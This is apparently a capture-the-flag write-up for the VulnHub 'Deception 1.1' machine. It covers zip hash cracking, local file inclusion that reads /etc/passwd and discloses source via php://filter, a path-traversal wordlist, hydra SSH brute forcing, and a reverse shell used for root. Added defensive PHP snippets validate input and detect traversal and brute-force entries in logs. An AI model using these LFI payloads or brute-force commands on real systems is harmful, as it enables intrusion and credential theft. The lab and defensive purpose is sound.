VulnHub Link: https://www.vulnhub.com/entry/haclabs-deception11,440/
Description:
This machine is the next part of Deception machine. This time try harder to get root!
To complete this challenge you need to find 3 flags.
flag 2 : Password to unzip the zip file.
flag 1 : Present in /home/yash/
flag 0 : Present in /root/
This is a beginner/intermediate level machine.
Technical Information : machine is based on Ubuntu 64bit
Tested on virtualBox
DHCP is enabled (set as bridged networking)
NOTE : you may face connection lost issue, no problem restart the virtual machine and everything will start to work again!
I found "646563657074696f6e312e31" this while creating the machine.
Contact
If you have solved this machine in an unintended way then please let us know, you may get a chance to publish your writeup on our website.
Works best in VirtualBox rather than VMware. Note: This is MEANT to be password protected
So the first flag they ask us for is the password to unzip the archive (the VirtualBox .ova file is inside).

I could use zip2john to extract the zip hash and try to crack it with a good wordlist,
but I prefer to stay with the box description, and exactly this line:
I found "646563657074696f6e312e31" this while creating the machine .
You may think it is a hash, but no: it is a hex-encoded string, and decoding it gives:
deception1.1
Before trying it, let’s get the hash using zip2john:
> zip2john haclabs_deception1.1.zip > zip.hash
ver 2.0 efh 5455 efh 7875 haclabs_deception1.1.zip/Deception1.1.ova PKZIP Encr: 2b chk, TS_chk, cmplen=760997141, decmplen=776150016, crc=9E71CD97
and we have the hash in “zip.hash”.
Now we add the password “deception1.1” to rockyou.txt and give John the Ripper a run:
C:\Users\ADMIN\Desktop
> johntheripper --wordlist=rockyou.txt zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
No password hashes left to crack (see FAQ)
C:\Users\ADMIN\Desktop
> johntheripper --show zip.hash
haclabs_deception1.1.zip/Deception1.1.ova:deception1.1:Deception1.1.ova:haclabs_deception1.1.zip::haclabs_deception1.1.zip
1 password hash cracked, 0 left
So the password is correct. Let’s unzip the box and run it …
Nmap Scan:
> nmap -sC -sV 192.168.9.107
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-11 01:56 W. Central Africa Standard Time
Nmap scan report for 192.168.9.107
Host is up (0.000012s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 75:b3:93:d4:f1:02:30:bf:35:ea:12:4e:3b:e7:fa:4a (RSA)
| 256 f9:8c:43:5b:45:7d:fe:84:b1:f5:93:a3:68:bb:ce:84 (ECDSA)
|_ 256 77:2a:33:3e:8f:2b:65:a5:f3:df:b5:bc:58:4a:f4:8e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:4F:4F:EC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.77 seconds
We have 2 open ports:
22 ==> SSH
80 ==> Apache HTTPD

Welcome to haclabs!
A dream does not become reality through magic; it takes sweat, determination, and hard work. ~ Colin Powell, former U.S. Defense Secretary
HacLabs is a group of university students who are passionate about technology, writing and publishing articles to educate and enlighten those in need. We primarily focus on CTFs, Cloud, Data Structures and Algorithm and anything related to computer science.
Password strength checker designed by haclabs!
So they say this is a kind of password strength checker. Let’s see what we get when we type admin:admin.
The request sent, as captured in Burp Suite:
POST /users.php HTTP/1.1
Host: 192.168.9.107
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Referer: http://192.168.9.107/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

username=admin&password=admin&login=Check
The Response:
HTTP/1.1 200 OK
Date: Sat, 11 Apr 2020 06:21:56 GMT
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding
Content-Length: 357
Connection: close
Content-Type: text/html; charset=UTF-8

<html>
<body style="background-color:black">
<pre style="color:blue;font-size:40px;text-align:center">
Welcome User : admin
</pre>
<br><pre style="color:green;font-size:20px;text-align:left">Password should be at least 8 characters in length and should include at least one upper case letter
one number, and one special character.</pre>
</body>
</html>
Let’s change our password to Admin1234!
The Response:
HTTP/1.1 200 OK
Date: Sat, 11 Apr 2020 06:23:21 GMT
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding
Content-Length: 364
Connection: close
Content-Type: text/html; charset=UTF-8

<html>
<body style="background-color:black">
<pre style="color:blue;font-size:40px;text-align:center">
Welcome User : admin
</pre>
<br><pre style="color:green;font-size:20px;text-align:left"><script>alert('0000flagflagflagflag.php')</script>Password is strong , contains all 4 things(uppercase,lowercase,number,specialchars) with flag=1 </pre>
</body>
</html>
In the browser an alert pops up:

I checked whether the file “0000flagflagflagflag.php” exists, but nothing!
<script>alert('0000flagflagflagflag.php')</script>Password is strong , contains all 4 things(uppercase,lowercase,number,specialchars) with flag=1 </pre>
Here it says flag=1, so let’s replace each “flag” with a 1: “00001111.php” …

We have something now :D !
The page source:
<script>alert('find password.txt')</script>
<html>
<body><!-- use ?page= --!></body>
</html>
There is a comment that says to use “?page=”.

I tried to read password.txt:
http://192.168.9.107/00001111.php?page=password.txt
I got nothing, so I changed it to /etc/passwd, and we have the passwd file:
root:x:0:0:root:/root:/bin/bash
haclabs:$6$E0Wz59PNTRyh.NJv$E4cKcQXD6lZEhmK4U.nbutUrw1pCQmqRppOThOp/AJorXoDsj2RGhWNiPl1GTwHiVvfExzYhS70QFNgnv.Z7/.:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
avahi:x:107:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:108:118::/var/lib/saned:/usr/sbin/nologin
colord:x:109:119:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:110:7:HPLIP system user,,,:/var/run/hplip:/bin/false
yash:x:1000:1000:yash,,,:/home/yash:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
We have a kind of LFI here :D
http://192.168.9.107/00001111.php?page=php://filter/convert.base64-encode/resource=00001111.php
The php://filter wrapper works, and this is the content of 00001111.php after decoding the base64:
<?php
echo "<script>alert('find password.txt')</script>";
$file = $_GET['page'];               // user-controlled, not validated at all
$files = file_get_contents($file);   // reads any local path or stream wrapper
echo $files;                         // and echoes it straight back
?>
So the script uses file_get_contents(), which means that even if we found access.log it wouldn’t matter:
the file content is only echoed back, not executed (that would need include or require), so log poisoning is out …
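As an added example (this is not code from the machine or from the writeup), here is how that loader could be written so the page parameter can no longer be turned into an arbitrary file read. The client only chooses a name; the server fixes the directory and the extension and checks that the resolved file really sits inside that directory. The page names, the `.html` extension, the `pages/` directory and the `resolvePage()` function name are assumptions for the demo, and the temporary web root is constructed so the script runs on its own.

```php
<?php
// Added example (not the machine's 00001111.php): a hardened page loader.
// The original hands $_GET['page'] straight to file_get_contents(), so any
// path ("/etc/passwd", "../../password.txt") or stream wrapper ("php://filter")
// is accepted. Here the client only chooses a name; the server decides the
// directory, the extension and whether the resolved file is really inside it.
declare(strict_types=1);

/**
 * Map a user-supplied page name to a file inside $baseDir, or return null.
 *  1. The name must match a tight token pattern, which excludes '/', '\', ':'
 *     and '.', so traversal, absolute paths and wrappers never reach the FS.
 *  2. The extension is fixed by the server, not the client.
 *  3. The canonical path must still start with the canonical base directory
 *     (defence in depth against symlinks or a later loosening of rule 1).
 */
function resolvePage(string $page, string $baseDir): ?string
{
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $page) !== 1) {
        return null;                                   // rule 1
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;                                   // base dir missing
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $page . '.html'); // rule 2
    if ($candidate === false) {
        return null;                                   // no such page
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;                                   // rule 3: escaped the root
    }
    return $candidate;
}

// Constructed demo: a throw-away web root containing a single page.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . bin2hex(random_bytes(4));
mkdir($root, 0700);
file_put_contents($root . DIRECTORY_SEPARATOR . 'home.html', "<h1>home</h1>\n");

$inputs = [
    'home',                                                     // legitimate page
    '../../password.txt',                                       // traversal
    '/etc/passwd',                                              // absolute path
    'php://filter/convert.base64-encode/resource=00001111.php', // stream wrapper
    'missing',                                                  // well-formed, absent
];
foreach ($inputs as $input) {
    $path = resolvePage($input, $root);
    printf("%-60s -> %s\n", $input, $path === null ? 'rejected' : 'served ' . basename($path));
}

unlink($root . DIRECTORY_SEPARATOR . 'home.html');
rmdir($root);

// In the real handler the body of the original script shrinks to:
//   $path = resolvePage($_GET['page'] ?? '', __DIR__ . '/pages');
//   if ($path === null) { http_response_code(404); exit; }
//   readfile($path);
```

Rule 1 alone would have stopped every request used in this writeup; rules 2 and 3 are there so that a later change to the allowed characters, or a symlink dropped into the pages directory, cannot quietly bring the file read back.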

Let’s put the other LFI tricks aside and go back to the challenge, which asks us to find password.txt.
So I have to run something with wfuzz:
C:\Users\ADMIN\Desktop
> wfuzz -c -u "http://192.168.9.107/00001111.php?page=FUZZ/password.txt" -w dot.txt --hw 10
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************

Target: http://192.168.9.107/00001111.php?page=FUZZ/password.txt
Total requests: 21
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000002: 200 61 L 32 W 263 Ch "../../"

Total time: 0.023503
Processed Requests: 21
Filtered Requests: 20
Requests/sec.: 893.4914
dot.txt contains this:
../
../../
../../../
../../../../
../../../../../
../../../../../../
../../../../../../../
../../../../../../../../
../../../../../../../../../
../../../../../../../../../../
../../../../../../../../../../../
../../../../../../../../../../../../
../../../../../../../../../../../../../
../../../../../../../../../../../../../../
../../../../../../../../../../../../../../../
../../../../../../../../../../../../../../../../
../../../../../../../../../../../../../../../../../
../../../../../../../../../../../../../../../../../../
../../../../../../../../../../../../../../../../../../../
../../../../../../../../../../../../../../../../../../../../
../../../../../../../../../../../../../../../../../../../../../
I use it for path traversal! …
So going back to wfuzz, it found something at:
000000002: 200 61 L 32 W 263 Ch "../../"
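From the defender’s side, the 21 requests wfuzz just sent, together with the earlier /etc/passwd and php://filter requests, all land in Apache’s access log, and they are easy to pick out. As an added example that is not part of this writeup, the PHP below scans combined-format access log lines for dot-dot traversal, PHP stream wrappers and well-known sensitive file names, decoding the URI twice so double-encoded variants are caught too. The sample lines are constructed to resemble this attack (client addresses, sizes and user agents are made up), and the function names are my own.

```php
<?php
// Added example, not part of the writeup: flag traversal, stream-wrapper and
// sensitive-file probes in Apache combined-format access log lines.
declare(strict_types=1);

// Fields we need from the combined log format: client IP and request URI.
const ACCESS_LOG_RE = '/^(?<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:\S+) (?<uri>\S+) [^"]*" \d{3} /';

/**
 * Return the indicators found in one log line (empty array when clean).
 * The URI is percent-decoded twice so double-encoded "..%252F" is caught,
 * and backslashes are folded to slashes before matching.
 */
function traversalIndicators(string $line): array
{
    if (preg_match(ACCESS_LOG_RE, $line, $m) !== 1) {
        return [];                                  // not a request line we can parse
    }
    $uri = str_replace('\\', '/', rawurldecode(rawurldecode($m['uri'])));
    $found = [];
    if (preg_match('#\.\.(?:/|$)#', $uri) === 1) {
        $found[] = 'dot-dot traversal';
    }
    if (preg_match('#\b(?:php|file|data|expect|zip|phar|glob)://#i', $uri) === 1) {
        $found[] = 'stream wrapper';
    }
    if (preg_match('#/etc/(?:passwd|shadow)\b#', $uri) === 1) {
        $found[] = 'sensitive file';
    }
    return $found;
}

/** Aggregate hits per client IP: [ip => ['count' => n, 'indicators' => [...]]]. */
function scanAccessLog(array $lines): array
{
    $report = [];
    foreach ($lines as $line) {
        $hits = traversalIndicators($line);
        if ($hits === [] || preg_match(ACCESS_LOG_RE, $line, $m) !== 1) {
            continue;
        }
        $ip = $m['ip'];
        $report[$ip]['count'] = ($report[$ip]['count'] ?? 0) + 1;
        $report[$ip]['indicators'] = array_values(array_unique(
            array_merge($report[$ip]['indicators'] ?? [], $hits)
        ));
    }
    return $report;
}

// Constructed sample resembling what this attack leaves behind (not real logs).
$sample = [
    '192.168.9.10 - - [11/Apr/2020:06:21:56 +0100] "POST /users.php HTTP/1.1" 200 357 "-" "Mozilla/5.0"',
    '192.168.9.10 - - [11/Apr/2020:06:40:02 +0100] "GET /00001111.php?page=password.txt HTTP/1.1" 200 263 "-" "Mozilla/5.0"',
    '192.168.9.10 - - [11/Apr/2020:06:40:30 +0100] "GET /00001111.php?page=/etc/passwd HTTP/1.1" 200 1840 "-" "Mozilla/5.0"',
    '192.168.9.10 - - [11/Apr/2020:06:41:11 +0100] "GET /00001111.php?page=php://filter/convert.base64-encode/resource=00001111.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '192.168.9.10 - - [11/Apr/2020:06:45:00 +0100] "GET /00001111.php?page=../../password.txt HTTP/1.1" 200 263 "-" "Wfuzz/2.4.5"',
    '192.168.9.10 - - [11/Apr/2020:06:45:00 +0100] "GET /00001111.php?page=..%2F..%2F..%2Fpassword.txt HTTP/1.1" 200 263 "-" "Wfuzz/2.4.5"',
    '192.168.9.33 - - [11/Apr/2020:07:00:00 +0100] "GET /index.html HTTP/1.1" 200 512 "-" "curl/7.64.0"',
];

foreach (scanAccessLog($sample) as $ip => $info) {
    printf("%s: %d suspicious request(s): %s\n", $ip, $info['count'], implode(', ', $info['indicators']));
}
```

Note that the very first request for a plain password.txt is not flagged: on its own it is indistinguishable from a normal query, which is why the report aggregates per client, so one address accumulating several different indicator types stands out even when each single request looks harmless.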
So now by browsing to http://192.168.9.107/00001111.php?page=../../password.txt
we get:
I know the password for yash : ya5h**
but I forgot the last 2 words.find them and use to connect to SSH
So it says we have yash’s password with the last 2 characters missing (and this is the yash it means, from /etc/passwd):
yash:x:1000:1000:yash,,,:/home/yash:/bin/bash
So I had to write something to complete the last 2 characters and test for the right one.
I won’t use capital letters, because it looks like yash didn’t use any …
I like coding in PHP, so I searched Google for a PHP wordlist generator and found a good class:
https://github.com/gehaxelt/PHP-WordlistGenerator
I modified the example.php to this:
<?php
include_once 'wordlistgenerator.class.php';

// Only the last two characters are unknown, so generate every length-2 word
// over the lowercase alphabet and prefix each one with the known part "ya5h".
for ($i = 2; $i <= 2; $i++) {
    $ws = new WordlistGenerator($i, 'abcdefghijklmnopqrstuvwxyz');
    while ($ws->isNext()) {
        echo "ya5h" . $ws->getWord() . "\n";
        file_put_contents("yash_wordlist.txt", "ya5h" . $ws->getWord() . "\n", FILE_APPEND);
        $ws->nextWord();
    }
    unset($ws);
}
?>
This saves the generated words to a new text file, “yash_wordlist.txt”.
After generating the wordlist we feed it to hydra and run a quick brute force against SSH:
C:\Users\ADMIN\Desktop
> hydra -l yash -P yash_wordlist.txt ssh://192.168.9.107 -s 22 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-13 04:15:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 675 login tries (l:1/p:0), ~675 tries per task
[DATA] attacking ssh://192.168.9.107:22/
[22][ssh] host: 192.168.9.107 login: yash password: ya5hay
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-13 04:15:43
And we got a valid login:
[22][ssh] host: 192.168.9.107 login: yash password: ya5hay
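Hydra’s 675 attempts in about five seconds leave an equally obvious trace in the target’s auth.log: a burst of “Failed password for yash” lines from one address, followed by an “Accepted password”. As an added example, not part of the writeup, this PHP script flags a source address that exceeds a failure threshold within a time window and, more importantly, a successful login that follows such a burst. The log lines are constructed (hostname `deception`, PIDs and ports are made up), the threshold and window are assumptions, and the function names are my own.

```php
<?php
// Added example, not part of the writeup: flag SSH password-guessing bursts
// in auth.log and, above all, a successful login that follows one.
declare(strict_types=1);

/** Parse one sshd auth.log line into [ts, raw_ts, result, user, ip], or null. */
function parseSshdLine(string $line): ?array
{
    $lineRe = '/^(?<mon>[A-Z][a-z]{2})\s+(?<day>\d{1,2}) (?<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?<msg>.*)$/';
    if (preg_match($lineRe, $line, $m) !== 1) {
        return null;
    }
    $msgRe = '/^(?<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?(?<user>\S+) from (?<ip>\S+) port \d+/';
    if (preg_match($msgRe, $m['msg'], $mm) !== 1) {
        return null;                       // disconnects, pam messages etc. are ignored
    }
    $rawTs = "{$m['mon']} {$m['day']} {$m['time']}";
    $when = DateTime::createFromFormat('M j H:i:s', $rawTs); // syslog has no year
    if ($when === false) {
        return null;
    }
    return [
        'ts'     => $when->getTimestamp(),
        'raw_ts' => $rawTs,
        'result' => strtolower($mm['result']),
        'user'   => $mm['user'],
        'ip'     => $mm['ip'],
    ];
}

/**
 * Walk the lines in order and emit alerts:
 *  - 'burst'              : $threshold failures from one IP inside $windowSec
 *  - 'success-after-burst': an accepted login from an IP that is in a burst
 */
function detectSshBruteForce(array $lines, int $threshold = 10, int $windowSec = 60): array
{
    $failures = [];   // ip => timestamps of failures still inside the window
    $alerts   = [];
    foreach ($lines as $line) {
        $ev = parseSshdLine($line);
        if ($ev === null) {
            continue;
        }
        $ip = $ev['ip'];
        $t  = $ev['ts'];
        // slide the window: forget failures older than $windowSec
        $failures[$ip] = array_values(array_filter(
            $failures[$ip] ?? [],
            fn(int $x): bool => $x >= $t - $windowSec
        ));
        if ($ev['result'] === 'failed') {
            $failures[$ip][] = $t;
            if (count($failures[$ip]) === $threshold) {   // fires when the threshold is first reached
                $alerts[] = ['type' => 'burst', 'ip' => $ip, 'user' => $ev['user'], 'at' => $ev['raw_ts']];
            }
        } elseif (count($failures[$ip]) >= $threshold) {
            $alerts[] = ['type' => 'success-after-burst', 'ip' => $ip, 'user' => $ev['user'], 'at' => $ev['raw_ts']];
        }
    }
    return $alerts;
}

// Constructed sample (hostname, PIDs and ports made up): 12 guesses for yash in
// four seconds, then a success; a lone failure and a key login from elsewhere.
$sample = [];
for ($i = 0; $i < 12; $i++) {
    $sample[] = sprintf('Apr 13 04:15:%02d deception sshd[%d]: Failed password for yash from 192.168.9.10 port %d ssh2',
        38 + intdiv($i, 3), 2000 + $i, 51000 + $i);
}
$sample[] = 'Apr 13 04:15:43 deception sshd[2012]: Accepted password for yash from 192.168.9.10 port 51012 ssh2';
$sample[] = 'Apr 13 04:20:00 deception sshd[2100]: Failed password for invalid user admin from 192.168.9.33 port 40000 ssh2';
$sample[] = 'Apr 13 04:21:00 deception sshd[2101]: Accepted publickey for yash from 192.168.9.33 port 40001 ssh2';

foreach (detectSshBruteForce($sample) as $a) {
    printf("[%s] %s user=%s from %s\n", $a['at'], $a['type'], $a['user'], $a['ip']);
}
```

The success-after-burst case is the one worth paging someone for: a burst alone may be noise, but an accepted login from the same address right after it means the guessing worked. In practice the same logic is what fail2ban applies to sshd, and a low MaxAuthTries plus key-only authentication removes the whole class of problem; the script assumes PHP 7.4 or later for the arrow function.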
Let’s log in and do some enumeration …

As you can see, that was a quick enumeration :p. We’ll get root in a few seconds: after logging in with SCP for Windows,
I modify the file perm.sh to contain a reverse shell.

After saving it and starting our listener on port 5656,
let’s go back to our SSH session and run the perm.sh file …

It says connection refused, but checking the listener, we got something back …

And that was all for this boot2root challenge :D
Hope you enjoyed!
Follow me on Twitter: https://twitter.com/ab2pentest
If you liked my writeup and want to support me for more:
https://www.buymeacoffee.com/ab2pentest
Other writeups and tools can be found here:
https://github.com/ab2pentest